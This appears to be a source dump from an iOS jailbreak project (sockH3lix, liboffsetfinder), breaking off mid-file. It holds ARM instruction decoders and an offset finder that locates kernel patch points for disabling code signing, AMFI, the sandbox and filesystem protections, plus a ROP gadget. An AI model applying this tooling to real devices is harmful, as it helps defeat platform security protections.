| 32 | int _dictptr; 33 | 34 | int _copyptr; 35 | int _copycount; 36 | 37 | int _inputoffset; 38 | int _outputoffset; 39 | public: 40 | lzssdecompress(); 41 | ~lzssdecompress(); 42 | void reset(); 43 | void decompress(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused, uint8_t *src, uint32_t srclen, uint32_t *psrcused); 44 | void flush(uint8_t *dst, uint32_t dstlen, uint32_t *pdstused); 45 | void copyfromdict(); 46 | void dumpcopydata(); 47 | void addtodict(uint8_t c); 48 | void nextflagbit(); 49 | void setcounter(uint8_t first, uint8_t second); 50 | }; 51 | 52 | static const uint64_t lzss_magic = 0x636f6d706c7a7373; 53 | 54 | struct lzss_hdr { 55 | uint64_t magic; 56 | uint32_t checksum; 57 | uint32_t size; 58 | uint32_t src_size; 59 | uint32_t unk1; 60 | uint8_t padding[0x168]; 61 | }; 62 | 63 | #ifdef __APPLE__ 64 | 65 | #include 66 | 67 | #define htobe16(x) OSSwapHostToBigInt16(x) 68 | #define htole16(x) OSSwapHostToLittleInt16(x) 69 | #define be16toh(x) OSSwapBigToHostInt16(x) 70 | #define le16toh(x) OSSwapLittleToHostInt16(x) 71 | 72 | #define htobe32(x) OSSwapHostToBigInt32(x) 73 | #define htole32(x) OSSwapHostToLittleInt32(x) 74 | #define be32toh(x) OSSwapBigToHostInt32(x) 75 | #define le32toh(x) OSSwapLittleToHostInt32(x) 76 | 77 | #define htobe64(x) OSSwapHostToBigInt64(x) 78 | #define htole64(x) OSSwapHostToLittleInt64(x) 79 | #define be64toh(x) OSSwapBigToHostInt64(x) 80 | #define le64toh(x) OSSwapLittleToHostInt64(x) 81 | 82 | #else 83 | #include 84 | #endif 85 | 86 | #else 87 | extern int g_debug; 88 | #endif 89 | 90 | #endif 91 | 92 | -------------------------------------------------------------------------------- /liboffsetfinder32/offsetfinder32.hpp: -------------------------------------------------------------------------------- 1 | // 2 | // offsetfinder32.hpp 3 | // sockH3lix 4 | // 5 | // Created by SXX on 2020/12/19. 6 | // Copyright © 2020 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef offsetfinder32_hpp 10 | #define offsetfinder32_hpp 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | namespace CR { 18 | typedef uint8_t *loc_t; 19 | typedef uintptr_t addr_t; 20 | class offsetfinder32 { 21 | private: 22 | using patch = tihmstar::patchfinder64::patch; 23 | struct { 24 | loc_t _bcopy; 25 | loc_t _release_arm; 26 | loc_t _sbops; 27 | loc_t _bcopy_phys; 28 | loc_t _pmap_find_phys; 29 | loc_t _kernel_map; 30 | loc_t _kernel_pmap; 31 | patch _i_can_has_debugger_patch_off; 32 | std::vector _amfi_substrate_patch; 33 | patch _proc_enforce; 34 | patch _cs_enforcement_disable_amfi; 35 | patch _remount_patch_offset; 36 | std::vector _nosuid_off; 37 | patch _amfi_patch_offsets; 38 | patch _lwvm_patch_offsets; 39 | }; 40 | uint8_t *kernel = NULL; 41 | size_t kernel_size = 0; 42 | addr_t xnucore_base = 0; 43 | addr_t xnucore_size = 0; 44 | addr_t prelink_base = 0; 45 | addr_t prelink_size = 0; 46 | addr_t pplcode_base = 0; 47 | addr_t pplcode_size = 0; 48 | addr_t cstring_base = 0; 49 | addr_t cstring_size = 0; 50 | addr_t pstring_base = 0; 51 | addr_t pstring_size = 0; 52 | addr_t kerndumpbase = -1; 53 | addr_t kernel_entry = 0; 54 | void *kernel_mh = 0; 55 | addr_t kernel_delta = 0; 56 | addr_t const_base = 0; 57 | addr_t const_size = 0; 58 | addr_t oslstring_base = 0; 59 | addr_t oslstring_size = 0; 60 | addr_t data_base = 0; 61 | addr_t data_size = 0; 62 | 63 | loc_t find_symbol(const char *symbol) const; 64 | loc_t _find_syscall0() const; 65 | 66 | std::vector _find_amfi_substrate_patch(); 67 | patch _find_i_can_has_debugger_patch_off(); 68 | patch _find_lwvm_patch_offsets(); 69 | patch _find_proc_enforce(); 70 | patch _find_cs_enforcement_disable_amfi(); 71 | patch _find_remount_patch_offset(); 72 | std::vector _find_nosuid_off(); 73 | patch _find_amfi_patch_offsets(); 74 | 75 | loc_t _find_release_arm() const; 76 | loc_t _find_kernel_map() const; 77 | loc_t _find_sbops() const; 78 | loc_t _find_bcopy_phys() const; 79 | loc_t _find_pmap_find_phys() const; 80 | loc_t _find_kernel_pmap() const; 81 | public: 82 | offsetfinder32(const char *filename); 83 | 84 | inline loc_t linker_base() const { 85 | return (loc_t)0x80001000; 86 | } 87 | 88 | constexpr inline loc_t find_kernel_map() const { 89 | return _kernel_map; 90 | } 91 | constexpr inline loc_t find_bcopy() const { 92 | return _bcopy; 93 | } 94 | constexpr inline loc_t find_release_arm() const { 95 | return _release_arm; 96 | } 97 | constexpr inline loc_t find_sbops() const { 98 | return _sbops; 99 | } 100 | constexpr inline loc_t find_bcopy_phys() const { 101 | return _bcopy_phys; 102 | } 103 | constexpr inline loc_t find_pmap_find_phys() const { 104 | return _pmap_find_phys; 105 | } 106 | constexpr inline loc_t find_kernel_pmap() const { 107 | return _kernel_pmap; 108 | } 109 | 110 | constexpr inline const patch &find_i_can_has_debugger_patch_off() const { 111 | return _i_can_has_debugger_patch_off; 112 | } 113 | 114 | 115 | loc_t find_zone_map() const; 116 | 117 | loc_t find_realhost() const; 118 | loc_t find_kernel_task() const; 119 | size_t find_sizeof_task() const; 120 | uint32_t find_proc_ucred() const; 121 | loc_t find_rop_add_r0_r0_0x40() const; 122 | loc_t find_IOMalloc() const; 123 | loc_t find_IOFree() const; 124 | loc_t find_panic() const; 125 | uintptr_t find_vtab_get_external_trap_for_index() const; 126 | 127 | loc_t find_gPhysBase() const; 128 | 129 | patch find_sandbox_patch(); 130 | 131 | inline std::vector all_patches() const { 132 | return { 133 | _i_can_has_debugger_patch_off, 134 | _remount_patch_offset, 135 | _lwvm_patch_offsets, 136 | _nosuid_off[0], 137 | _nosuid_off[1], 138 | _proc_enforce, 139 | _cs_enforcement_disable_amfi, 140 | _amfi_patch_offsets, 141 | _amfi_substrate_patch[0], 142 | _amfi_substrate_patch[1], 143 | }; 144 | } 145 | }; 146 | 147 | } 148 | 149 | #endif /* offsetfinder32_h */ 150 | -------------------------------------------------------------------------------- /liboffsetfinder32/patchfinder32.c: -------------------------------------------------------------------------------- 1 | // 2 | // patchfinder32.c 3 | // sockH3lix 4 | // 5 | // Created by SXX on 2020/12/20. 6 | // Copyright © 2020 tihmstar. All rights reserved. 7 | // 8 | 9 | #include "patchfinder32.h" 10 | #include 11 | 12 | 13 | #define HAS_BITS(a,b) (((a) & (b)) == (b)) 14 | 15 | static uint32_t 16 | bit_range(uint32_t x, int start, int end) { 17 | x = (x << (31 - start)) >> (31 - start); 18 | x = (x >> end); 19 | return x; 20 | } 21 | 22 | static uint32_t 23 | ror(uint32_t x, int places) { 24 | return (x >> places) | (x << (32 - places)); 25 | } 26 | 27 | static int 28 | thumb_expand_imm_c(uint16_t imm12) { 29 | if(bit_range(imm12, 11, 10) == 0) { 30 | switch(bit_range(imm12, 9, 8)) { 31 | case 0: 32 | return bit_range(imm12, 7, 0); 33 | case 1: 34 | return (bit_range(imm12, 7, 0) << 16) | bit_range(imm12, 7, 0); 35 | case 2: 36 | return (bit_range(imm12, 7, 0) << 24) | (bit_range(imm12, 7, 0) << 8); 37 | case 3: 38 | return (bit_range(imm12, 7, 0) << 24) | (bit_range(imm12, 7, 0) << 16) | (bit_range(imm12, 7, 0) << 8) | bit_range(imm12, 7, 0); 39 | default: 40 | return 0; 41 | } 42 | } else { 43 | uint32_t unrotated_value = 0x80 | bit_range(imm12, 6, 0); 44 | return ror(unrotated_value, bit_range(imm12, 11, 7)); 45 | } 46 | } 47 | 48 | int 49 | insn_is_32bit(uint16_t* i) { 50 | return (*i & 0xe000) == 0xe000 && (*i & 0x1800) != 0x0; 51 | } 52 | 53 | 54 | int 55 | insn_is_add_reg(uint16_t* i) { 56 | if((*i & 0xFE00) == 0x1800) 57 | return 1; 58 | else if((*i & 0xFF00) == 0x4400) 59 | return 1; 60 | else if((*i & 0xFFE0) == 0xEB00) 61 | return 1; 62 | else 63 | return 0; 64 | } 65 | 66 | int 67 | insn_add_reg_rd(uint16_t* i) { 68 | if((*i & 0xFE00) == 0x1800) 69 | return (*i & 7); 70 | else if((*i & 0xFF00) == 0x4400) 71 | return (*i & 7) | ((*i & 0x80) >> 4) ; 72 | else if((*i & 0xFFE0) == 0xEB00) 73 | return (*(i + 1) >> 8) & 0xF; 74 | else 75 | return 0; 76 | } 77 | 78 | int 79 | insn_add_reg_rm(uint16_t* i) { 80 | if((*i & 0xFE00) == 0x1800) 81 | return (*i >> 6) & 7; 82 | else if((*i & 0xFF00) == 0x4400) 83 | return (*i >> 3) & 0xF; 84 | else if((*i & 0xFFE0) == 0xEB00) 85 | return *(i + 1) & 0xF; 86 | else 87 | return 0; 88 | } 89 | 90 | int 91 | insn_is_mov_imm(uint16_t* i) { 92 | if((*i & 0xF800) == 0x2000) 93 | return 1; 94 | else if((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0) 95 | return 1; 96 | else if((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0) 97 | return 1; 98 | else 99 | return 0; 100 | } 101 | 102 | int 103 | insn_mov_imm_rd(uint16_t* i) { 104 | if((*i & 0xF800) == 0x2000) 105 | return (*i >> 8) & 7; 106 | else if((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0) 107 | return (*(i + 1) >> 8) & 0xF; 108 | else if((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0) 109 | return (*(i + 1) >> 8) & 0xF; 110 | else 111 | return 0; 112 | } 113 | 114 | int 115 | insn_mov_imm_imm(uint16_t* i) { 116 | if((*i & 0xF800) == 0x2000) 117 | return *i & 0xF; 118 | else if((*i & 0xFBEF) == 0xF04F && (*(i + 1) & 0x8000) == 0) 119 | return thumb_expand_imm_c(((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF)); 120 | else if((*i & 0xFBF0) == 0xF240 && (*(i + 1) & 0x8000) == 0) 121 | return ((*i & 0xF) << 12) | ((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF); 122 | else 123 | return 0; 124 | } 125 | 126 | int 127 | insn_is_movt(uint16_t* i) { 128 | return (*i & 0xFBF0) == 0xF2C0 && (*(i + 1) & 0x8000) == 0; 129 | } 130 | 131 | int 132 | insn_movt_rd(uint16_t* i) { 133 | return (*(i + 1) >> 8) & 0xF; 134 | } 135 | 136 | int 137 | insn_movt_imm(uint16_t* i) { 138 | return ((*i & 0xF) << 12) | ((*i & 0x0400) << 1) | ((*(i + 1) & 0x7000) >> 4) | (*(i + 1) & 0xFF); 139 | } 140 | 141 | int 142 | insn_is_ldr_imm(uint16_t* i) { 143 | uint8_t opA = bit_range(*i, 15, 12); 144 | uint8_t opB = bit_range(*i, 11, 9); 145 | 146 | return opA == 6 && (opB & 4) == 4; 147 | } 148 | 149 | int 150 | insn_is_ldr_literal(uint16_t *i) { 151 | return (*i >> 11) == 0b01001; 152 | } 153 | 154 | int 155 | insn_is_adr(uint16_t *i) { 156 | return HAS_BITS(*i, 0b10100 << 11); 157 | } 158 | 159 | 160 | int 161 | insn_is_pop(uint16_t *i) { 162 | return (*i >> 9) == 0b1011110; 163 | } 164 | 165 | int 166 | insn_is_push(uint16_t *i) { 167 | return HAS_BITS(*i, 0b1011010 << 9); 168 | } 169 | 170 | int 171 | insn_is_thumb2_pop(uint16_t *i) { 172 | return (*i == 0xe8bd); 173 | } 174 | 175 | int 176 | insn_is_thumb2_tst(uint16_t *i) { 177 | return !insn_is_bl(i) && (((*i >> 5) & ~(0b100000)) == 0b11110000000); 178 | } 179 | 180 | int 181 | insn_tst_imm(uint16_t *i) { 182 | return *(i+1) % (1<<8); 183 | } 184 | 185 | int 186 | insn_is_thumb2_push(uint16_t *i) { 187 | return (*i == 0xe92d); 188 | } 189 | 190 | int 191 | insn_is_thumb2_ldr(uint16_t *i) { 192 | return HAS_BITS(*i, 0b111110001101 << 4); 193 | } 194 | 195 | int 196 | insn_ldr_imm_rt(uint16_t* i) { 197 | return (*i & 7); 198 | } 199 | 200 | int 201 | insn_ldr_imm_imm(uint16_t* i) { 202 | return (((*i >> 6) & 0x1F) << 2); 203 | } 204 | 205 | int 206 | insn_thumb2_ldr_imm_imm(uint16_t* i) { 207 | return *(i+1) % (1<<12); 208 | } 209 | 210 | int 211 | insn_is_bl(uint16_t* i) { 212 | if ((*i & 0xf800) == 0xf000 && (*(i + 1) & 0xd000) == 0xd000) { 213 | return 1; 214 | } else if ((*i & 0xf800) == 0xf000 && (*(i + 1) & 0xd001) == 0xc000) { 215 | return 1; 216 | } else { 217 | return 0; 218 | } 219 | } 220 | 221 | int 222 | insn_is_thumb2_branch(uint16_t *i) { 223 | return (*i >>11 == 0b11110) && (*(i+1)>>15 == 0b1); 224 | } 225 | 226 | int 227 | insn_is_thumb_branch(uint16_t *i) { 228 | return ((*i >>11 == 0b11100) || (*i >>12 == 0b1101)); 229 | } 230 | 231 | int 232 | insn_is_thumb2_bne(uint16_t *i) { 233 | return HAS_BITS(*i >>6, 0b1111000001) && (*(i+1)>>15 == 0b1); 234 | } 235 | 236 | int 237 | insn_is_thumb2_beqw(uint16_t *i) { 238 | return HAS_BITS(*i >>6, 0b1111000000) && (*(i+1)>>15 == 0b1); 239 | } 240 | 241 | int 242 | insn_is_thumb2_orr(uint16_t *i) { 243 | return HAS_BITS((*i)>>5, 0b11110000010) && (*(i+1) >> 15 == 0); 244 | } 245 | 246 | int 247 | insn_is_thumb2_strw(uint16_t *i) { 248 | return (*i >> 4) == 0b111110001100; 249 | } 250 | 251 | int 252 | insn_is_thumb2_add(uint16_t *i) { 253 | return (((*i >> 5) & ~(1<<5)) == 0b11110001000 && (*(i+1) >> 15) == 0); 254 | } 255 | 256 | uint8_t 257 | insn_thumb2_orr_rn(uint16_t *i) { 258 | return *i % (1<<4); 259 | } 260 | 261 | uint8_t 262 | insn_ldr_literal_rt(uint16_t *i) { 263 | return (*i >> 8) % (1 << 3); 264 | } 265 | 266 | uint8_t 267 | insn_ldr_literal_imm(uint16_t *i) { 268 | return *i % (1 << 8); 269 | } 270 | 271 | uint8_t 272 | insn_adr_rd(uint16_t *i) { 273 | return (*i >> 8) % (1 << 3); 274 | } 275 | 276 | uint8_t 277 | insn_adr_imm(uint16_t *i) { 278 | return *i % (1 << 8); 279 | } 280 | 281 | uint8_t 282 | insn_thumb2_orr_rd(uint16_t *i) { 283 | return (*(i+1) >> 8) % (1 << 4); 284 | } 285 | 286 | uint8_t 287 | insn_thumb2_orr_imm(uint16_t *i) { 288 | return *(i+1) % (1<<8); 289 | } 290 | 291 | uint8_t 292 | insn_thumb2_strw_rn(uint16_t *i) { 293 | return *i % (1<<4); 294 | } 295 | 296 | uint8_t 297 | insn_thumb2_strw_rt(uint16_t *i) { 298 | return *(i+1) >> 12; 299 | } 300 | 301 | uint8_t 302 | insn_thumb2_strw_imm(uint16_t *i) { 303 | return *(i+1) % (1 << 12); 304 | } 305 | 306 | uint8_t 307 | insn_thumb2_add_rn(uint16_t *i) { 308 | return *i % (1 << 4); 309 | } 310 | 311 | uint8_t 312 | insn_thumb2_add_rd(uint16_t *i) { 313 | return (*(i+1) >> 8) % (1 << 4); 314 | } 315 | 316 | uint8_t 317 | insn_thumb2_add_imm(uint16_t *i) { 318 | return *(i+1) % (1 << 8); 319 | } 320 | 321 | uint32_t 322 | insn_thumb2_branch_imm(uint16_t *i) { 323 | uint32_t imm6 = (*i % (1<<6)); 324 | uint32_t imm11 = *(i+1) % (1<<11); 325 | return (imm6<<11) | imm11; 326 | } 327 | 328 | uint32_t 329 | insn_thumb_branch_imm(uint16_t *i) { 330 | if (*i >>11 == 0b11100) { 331 | return *i % (1<<11); 332 | }else{ 333 | return *i % (1<<8); 334 | } 335 | } 336 | 337 | uint32_t 338 | insn_bl_imm32(uint16_t* i) { 339 | uint16_t insn0 = *i; 340 | uint16_t insn1 = *(i + 1); 341 | uint32_t s = (insn0 >> 10) & 1; 342 | uint32_t j1 = (insn1 >> 13) & 1; 343 | uint32_t j2 = (insn1 >> 11) & 1; 344 | uint32_t i1 = ~(j1 ^ s) & 1; 345 | uint32_t i2 = ~(j2 ^ s) & 1; 346 | uint32_t imm10 = insn0 & 0x3ff; 347 | uint32_t imm11 = insn1 & 0x7ff; 348 | uint32_t imm32 = (imm11 << 1) | (imm10 << 12) | (i2 << 22) | (i1 << 23) | (s ? 0xff000000 : 0); 349 | return imm32; 350 | } 351 | 352 | uint16_t * 353 | find_rel_branch_ref(uint16_t* start, size_t len, int step, int (*branch_check_func)(uint16_t*), int32_t (*branch_imm_func)(uint16_t*)) { 354 | for (uint16_t *i = start; len > sizeof(uint16_t); len -= abs(step) * sizeof(uint16_t), i += step) { 355 | if (branch_check_func(i)) { 356 | int32_t imm = (branch_imm_func(i)+2)*2; 357 | uint8_t *dst = imm + (uint8_t*)i; 358 | if (dst == (uint8_t*)start) { 359 | return i; 360 | } 361 | } 362 | } 363 | return 0; 364 | } 365 | 366 | uint16_t* 367 | find_literal_ref(uint32_t region, uint8_t* kdata, size_t ksize, uint32_t address) { 368 | 369 | for (uint16_t *p = (uint16_t*)kdata; (uintptr_t)p < (uintptr_t)kdata + ksize; p++) { 370 | if (insn_add_reg_rm(p) == 15){ 371 | int rd = insn_add_reg_rd(p); 372 | uint32_t val = 0; 373 | uint8_t* pc = (uint8_t*)((uint8_t*)p - kdata + region); 374 | for (uint16_t *pp = p; (uintptr_t)pp > (uintptr_t)kdata; pp--) { 375 | 376 | if (insn_is_32bit(pp) && insn_is_movt(pp) && insn_movt_rd(pp) == rd && !(val >> 16)){ 377 | val |= insn_movt_imm(pp) << 16; 378 | } else if (insn_is_32bit(pp) && insn_is_mov_imm(pp) && insn_mov_imm_rd(pp) == rd && !(val & ((1 << 16) - 1))){ 379 | val |= insn_mov_imm_imm(pp); 380 | } else if (insn_is_ldr_literal(pp) && insn_ldr_literal_rt(pp) == rd){ 381 | val = (insn_ldr_literal_imm(pp) * 4 + 2); 382 | if (insn_is_32bit(pp)) 383 | val += 2; 384 | val = *(uint32_t*)(((uintptr_t)p + val) & ~3); 385 | break; 386 | } else if (insn_is_push(pp)){ 387 | val = 0; 388 | break; 389 | } 390 | if (val >> 16 && (val & ((1 << 16) - 1))) 391 | break; 392 | } 393 | if (!val) { 394 | continue; 395 | } 396 | uint8_t* ref = pc + 4 + val; 397 | if ((uintptr_t)ref == address + region) 398 | return p; 399 | } 400 | } 401 | return 0; 402 | } 403 | -------------------------------------------------------------------------------- /liboffsetfinder32/patchfinder32.h: -------------------------------------------------------------------------------- 1 | // 2 | // patchfinder32.h 3 | // sockH3lix 4 | // 5 | // Created by SXX on 2020/12/20. 6 | // Copyright © 2020 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef patchfinder32_h 10 | #define patchfinder32_h 11 | 12 | #include 13 | #include 14 | 15 | __BEGIN_DECLS 16 | 17 | int insn_is_32bit(uint16_t* i); 18 | 19 | int insn_is_add_reg(uint16_t* i); 20 | int insn_add_reg_rd(uint16_t* i); 21 | int insn_add_reg_rm(uint16_t* i); 22 | 23 | int insn_is_mov_imm(uint16_t* i); 24 | int insn_mov_imm_rd(uint16_t* i); 25 | int insn_mov_imm_imm(uint16_t* i); 26 | 27 | int insn_is_movt(uint16_t* i); 28 | int insn_movt_rd(uint16_t* i); 29 | int insn_movt_imm(uint16_t* i); 30 | 31 | int insn_is_ldr_imm(uint16_t* i); 32 | int insn_ldr_imm_rt(uint16_t* i); 33 | int insn_ldr_imm_imm(uint16_t* i); 34 | int insn_thumb2_ldr_imm_imm(uint16_t* i); 35 | 36 | 37 | int insn_is_bl(uint16_t* i); 38 | int insn_is_thumb2_branch(uint16_t *i); 39 | int insn_is_thumb_branch(uint16_t *i); 40 | int insn_is_thumb2_bne(uint16_t *i); 41 | int insn_is_thumb2_beqw(uint16_t *i); 42 | int insn_is_thumb2_orr(uint16_t *i); 43 | int insn_is_thumb2_strw(uint16_t *i); 44 | int insn_is_thumb2_add(uint16_t *i); 45 | int insn_is_ldr_literal(uint16_t *i); 46 | 47 | int insn_is_adr(uint16_t *i); 48 | 49 | 50 | uint8_t insn_thumb2_orr_rn(uint16_t *i); 51 | uint8_t insn_thumb2_orr_rd(uint16_t *i); 52 | uint8_t insn_thumb2_orr_imm(uint16_t *i); 53 | uint8_t insn_thumb2_strw_rn(uint16_t *i); 54 | uint8_t insn_thumb2_strw_rt(uint16_t *i); 55 | uint8_t insn_thumb2_strw_imm(uint16_t *i); 56 | uint8_t insn_thumb2_add_rn(uint16_t *i); 57 | uint8_t insn_thumb2_add_rd(uint16_t *i); 58 | uint8_t insn_thumb2_add_imm(uint16_t *i); 59 | uint8_t insn_ldr_literal_rt(uint16_t *i); 60 | uint8_t insn_ldr_literal_imm(uint16_t *i); 61 | uint8_t insn_adr_rd(uint16_t *i); 62 | uint8_t insn_adr_imm(uint16_t *i); 63 | 64 | uint32_t insn_thumb2_branch_imm(uint16_t *i); 65 | uint32_t insn_thumb_branch_imm(uint16_t *i); 66 | 67 | 68 | uint32_t insn_bl_imm32(uint16_t* i); 69 | 70 | int insn_is_pop(uint16_t *i); 71 | int insn_is_push(uint16_t *i); 72 | int insn_is_thumb2_ldr(uint16_t *i); 73 | int insn_is_thumb2_pop(uint16_t *i); 74 | int insn_is_thumb2_push(uint16_t *i); 75 | int insn_is_thumb2_tst(uint16_t *i); 76 | int insn_tst_imm(uint16_t *i); 77 | 78 | uint16_t *find_literal_ref(uint32_t region, uint8_t* kdata, size_t ksize, uint32_t address); 79 | uint16_t * 80 | find_rel_branch_ref(uint16_t* start, size_t len, int step, int (*branch_check_func)(uint16_t*), int32_t (*branch_imm_func)(uint16_t*)); 81 | 82 | __END_DECLS 83 | 84 | #endif /* patchfinder32_h */ 85 | -------------------------------------------------------------------------------- /liboffsetfinder64/all_liboffsetfinder.hpp: -------------------------------------------------------------------------------- 1 | // 2 | // all_liboffsetfinder.hpp 3 | // liboffsetfinder64 4 | // 5 | // Created by tihmstar on 09.03.18. 6 | // Copyright © 2018 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef all_liboffsetfinder_h 10 | #define all_liboffsetfinder_h 11 | 12 | #define OFFSETFINDER64_VERSION_COMMIT_COUNT "Release" 13 | #define OFFSETFINDER64_VERSION_COMMIT_SHA "Build: " __DATE__ " " __TIME__ 14 | #define BIT_RANGE(v,begin,end) ( ((v)>>(begin)) % (1 << ((end)-(begin)+1)) ) 15 | #define BIT_AT(v,pos) ( (v >> pos) % 2 ) 16 | 17 | #define info(a ...) ({printf(a),printf("\n");}) 18 | #define log(a ...) ({if (dbglog) printf(a),printf("\n");}) 19 | #define warning(a ...) ({if (dbglog) printf("[WARNING] "), printf(a),printf("\n");}) 20 | #define error(a ...) ({printf("[Error] "),printf(a),printf("\n");}) 21 | 22 | #define safeFree(ptr) ({if (ptr) free(ptr),ptr=NULL;}) 23 | 24 | #define reterror(err) throw tihmstar::exception(__LINE__, err, LOCAL_FILENAME) 25 | #define retcustomerror(err,except) throw tihmstar::except(__LINE__, err, LOCAL_FILENAME) 26 | #define assure(cond) if ((cond) == 0) throw tihmstar::exception(__LINE__, "assure failed", LOCAL_FILENAME) 27 | #define doassure(cond,code) do {if (!(cond)){(code);assure(cond);}} while(0) 28 | #define retassure(cond, err) if ((cond) == 0) throw tihmstar::exception(__LINE__,err,LOCAL_FILENAME) 29 | #define assureclean(cond) do {if (!(cond)){clean();assure(cond);}} while(0) 30 | 31 | 32 | #endif /* all_liboffsetfinder_h */ 33 | -------------------------------------------------------------------------------- /liboffsetfinder64/common.h: -------------------------------------------------------------------------------- 1 | // 2 | // common.h 3 | // liboffsetfinder64 4 | // 5 | // Created by tihmstar on 09.03.18. 6 | // Copyright © 2018 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef common_h 10 | #define common_h 11 | 12 | #include 13 | #include 14 | 15 | namespace tihmstar{ 16 | namespace patchfinder64{ 17 | typedef uint8_t* loc_t; 18 | typedef uint64_t offset_t; 19 | 20 | struct text_t{ 21 | patchfinder64::loc_t map; 22 | size_t size; 23 | patchfinder64::loc_t base; 24 | bool isExec; 25 | }; 26 | using segment_t = std::vector; 27 | } 28 | } 29 | 30 | #endif /* common_h */ 31 | -------------------------------------------------------------------------------- /liboffsetfinder64/exception.cpp: -------------------------------------------------------------------------------- 1 | // 2 | // exception.cpp 3 | // liboffsetfinder64 4 | // 5 | // Created by tihmstar on 09.03.18. 6 | // Copyright © 2018 tihmstar. All rights reserved. 7 | // 8 | 9 | #include "all_liboffsetfinder.hpp" 10 | #include 11 | #include 12 | 13 | using namespace tihmstar; 14 | 15 | exception::exception(int code, std::string err, std::string filename) : 16 | _err(err), 17 | _code(code), 18 | _build_commit_count(OFFSETFINDER64_VERSION_COMMIT_COUNT), 19 | _build_commit_sha(OFFSETFINDER64_VERSION_COMMIT_SHA), 20 | _filename(filename){}; 21 | 22 | const char *exception::what(){ 23 | return _err.c_str(); 24 | } 25 | 26 | int exception::code() const{ 27 | return _code | (int)(_filename.size()<<16); 28 | } 29 | 30 | const std::string& exception::build_commit_count() const { 31 | return _build_commit_count; 32 | }; 33 | 34 | const std::string& exception::build_commit_sha() const { 35 | return _build_commit_sha; 36 | }; 37 | 38 | out_of_range::out_of_range(std::string err) : exception(__LINE__, err, "exception.cpp"){}; 39 | 40 | symbol_not_found::symbol_not_found(int code, std::string sym, std::string filename) : exception(code,{"failed to find symbol: " + sym},filename) {}; 41 | 42 | load_command_not_found::load_command_not_found(int code, int cmd, std::string filename) : exception(code,{"failed to find cmd: " + std::to_string(cmd)},filename), _cmd(cmd) {}; 43 | int load_command_not_found::cmd() const { return _cmd;}; 44 | 45 | symtab_not_found::symtab_not_found(int code, std::string err, std::string filename) : exception(code,err,filename) {}; 46 | 47 | limit_reached::limit_reached(int code, std::string err, std::string filename) : exception(code,err,filename) {}; 48 | 49 | bad_branch_destination::bad_branch_destination(int code, std::string err, std::string filename) : exception(code,err,filename) {}; 50 | 51 | -------------------------------------------------------------------------------- /liboffsetfinder64/exception.hpp: -------------------------------------------------------------------------------- 1 | // 2 | // exception.hpp 3 | // liboffsetfinder64 4 | // 5 | // Created by tihmstar on 09.03.18. 6 | // Copyright © 2018 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef exception_hpp 10 | #define exception_hpp 11 | 12 | #include 13 | 14 | namespace tihmstar { 15 | class exception : public std::exception{ 16 | std::string _err; 17 | int _code; 18 | std::string _build_commit_count; 19 | std::string _build_commit_sha; 20 | std::string _filename; 21 | public: 22 | exception(int code, std::string err, std::string filename); 23 | 24 | //custom error can be used 25 | const char *what(); 26 | 27 | /* 28 | -first lowest two bytes of code is sourcecode line 29 | -next two bytes is strlen of filename in which error happened 30 | */ 31 | int code() const; 32 | 33 | //Information about build 34 | const std::string& build_commit_count() const; 35 | const std::string& build_commit_sha() const; 36 | }; 37 | 38 | //custom exceptions for makeing it easy to catch 39 | class out_of_range : public exception{ 40 | public: 41 | out_of_range(std::string err); 42 | }; 43 | 44 | class symbol_not_found : public exception{ 45 | public: 46 | symbol_not_found(int code, std::string sym, std::string filename); 47 | }; 48 | 49 | class load_command_not_found : public exception{ 50 | int _cmd; 51 | public: 52 | int cmd() const; 53 | load_command_not_found(int code, int cmd, std::string filename); 54 | }; 55 | 56 | class symtab_not_found : public exception{ 57 | public: 58 | symtab_not_found(int code, std::string err, std::string filename); 59 | }; 60 | 61 | class limit_reached : public exception{ 62 | public: 63 | limit_reached(int code, std::string err, std::string filename); 64 | }; 65 | 66 | class bad_branch_destination : public exception{ 67 | public: 68 | bad_branch_destination(int code, std::string err, std::string filename); 69 | }; 70 | 71 | }; 72 | 73 | #endif /* exception_hpp */ 74 | -------------------------------------------------------------------------------- /liboffsetfinder64/insn.hpp: -------------------------------------------------------------------------------- 1 | // 2 | // insn.hpp 3 | // liboffsetfinder64 4 | // 5 | // Created by tihmstar on 09.03.18. 6 | // Copyright © 2018 tihmstar. All rights reserved. 7 | // 8 | 9 | #ifndef insn_hpp 10 | #define insn_hpp 11 | 12 | #include 13 | #include 14 | 15 | namespace tihmstar{ 16 | namespace patchfinder64{ 17 | class insn{ 18 | public: 19 | enum segtype{ 20 | kText_only, 21 | kData_only, 22 | kText_and_Data 23 | }; 24 | private: 25 | std::pair _p; 26 | std::vector _segments; 27 | segtype _segtype; 28 | public: 29 | insn(segment_t segments, loc_t p = 0, segtype segType = kText_only); 30 | insn(const insn &cpy, loc_t p=0); 31 | insn &operator++(); 32 | insn &operator--(); 33 | insn operator+(int i); 34 | insn operator-(int i); 35 | insn &operator+=(int i); 36 | insn &operator-=(int i); 37 | insn &operator=(loc_t p); 38 | 39 | public: //helpers 40 | uint64_t pc(); 41 | uint32_t value(); 42 | uint64_t doublevalue(); 43 | 44 | public: //static type determinition 45 | static uint64_t deref(segment_t segments, loc_t p); 46 | static bool is_adrp(uint32_t i); 47 | static bool is_adr(uint32_t i); 48 | static bool is_add(uint32_t i); 49 | static bool is_bl(uint32_t i); 50 | static bool is_cbz(uint32_t i); 51 | static bool is_ret(uint32_t i); 52 | static bool is_tbnz(uint32_t i); 53 | static bool is_br(uint32_t i); 54 | static bool is_ldr(uint32_t i); 55 | static bool is_cbnz(uint32_t i); 56 | static bool is_movk(uint32_t i); 57 | static bool is_orr(uint32_t i); 58 | static bool is_tbz(uint32_t i); 59 | static bool is_ldxr(uint32_t i); 60 | static bool is_ldrb(uint32_t i); 61 | static bool is_str(uint32_t i); 62 | static bool 